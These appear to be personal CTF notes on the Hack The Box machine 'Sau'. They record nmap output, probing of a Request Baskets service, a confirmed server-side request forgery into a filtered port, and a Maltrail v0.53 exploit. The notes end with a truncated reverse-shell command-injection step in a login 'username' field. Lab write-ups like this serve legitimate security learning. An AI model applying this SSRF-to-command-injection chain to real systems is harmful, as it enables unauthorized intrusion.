nmap

sudo nmap -p22,80,55555 -sCV 10.10.11.224                                                                                                           
[sudo] password for kali: 
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-06-29 23:03 IST
Nmap scan report for sau.htb (10.10.11.224)
Host is up (0.20s latency).

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 aa:88:67:d7:13:3d:08:3a:8a:ce:9d:c4:dd:f3:e1:ed (RSA)
|   256 ec:2e:b1:05:87:2a:0c:7d:b1:49:87:64:95:dc:8a:21 (ECDSA)
|_  256 b3:0c:47:fb:a2:f2:12:cc:ce:0b:58:82:0e:50:43:36 (ED25519)
80/tcp    filtered http
55555/tcp open     http    Golang net/http server
| http-title: Request Baskets
|_Requested resource was /web
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     X-Content-Type-Options: nosniff
|     Date: Sun, 29 Jun 2025 17:34:17 GMT
|     Content-Length: 75
|     invalid basket name; the name does not match pattern: ^[wd-_\\.]{1,250}$
|   GenericLines, Help, LPDString, RTSPRequest, SIPOptions, SSLSessionReq, Socks5: 
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest: 
|     HTTP/1.0 302 Found
|     Content-Type: text/html; charset=utf-8
|     Location: /web
|     Date: Sun, 29 Jun 2025 17:33:59 GMT
|     Content-Length: 27
|     href="/web">Found</a>.
|   HTTPOptions: 
|     HTTP/1.0 200 OK
|     Allow: GET, OPTIONS
|     Date: Sun, 29 Jun 2025 17:34:00 GMT
|     Content-Length: 0
|   OfficeScan: 
|     HTTP/1.1 400 Bad Request: missing required Host header
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|_    Request: missing required Host header

check out 55555 . has a basket of some sort

curl <http://sau.htb:55555/fb2oh0w> -A '{{Hello basket}}'

registers the requests and shows it

trying ssti with -A char escaping : “\ didnt work

nothing fancy in burp

setting forwarding to my ip listener forwards the request

on setting proxy the the client waits for server to respond in string> printed to fail response and ends connection

It’s a confirmed server side request forgery

if it’s forwarding to my ip it should forward to it’s localhost:80

now curl again and check:

not all elements are loaded so not a full proxy like setup here.

Maltrail (v0.53) exploit

there’s a login page

send a rev shell with -d ‘ username=echo ….